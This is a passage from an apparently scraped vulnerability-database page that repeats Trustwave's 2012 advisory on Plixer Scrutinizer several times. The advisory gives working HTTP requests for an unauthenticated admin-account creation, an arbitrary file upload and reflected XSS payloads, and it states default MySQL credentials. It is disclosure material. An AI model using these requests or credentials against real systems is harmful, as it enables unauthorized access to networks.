User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0528 | CVE-2012-2626 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerabilities in adding administrator accounts |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. Scrutinizer is prone to an authentication-bypass vulnerability.
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker could exploit this vulnerability to add an administrative account through the manipulation of user preferences. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0303 | CVE-2012-3951 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) In any SQL Command execution vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session. Scrutinizer is prone to a security-bypass vulnerability.
Successful attacks can allow an attacker to gain access to the affected application using the default authentication credentials.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201207-0300 | CVE-2012-3848 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. (1) d4d/exporters.php Query string for (2) d4d/exporters.php To HTTP Referer header (3) d4d/contextMenu.php Unspecified input to. Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
package. The installation of these packages are transparent to the user
during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which
are not configured by the user which could be easily guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative
passwords:
#Request
select User,Password from mysql.user;
#Response
User |Password
root |
root |
scrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote'
users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the
equivalent of every network interface on the system allowing users with the
proper access rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
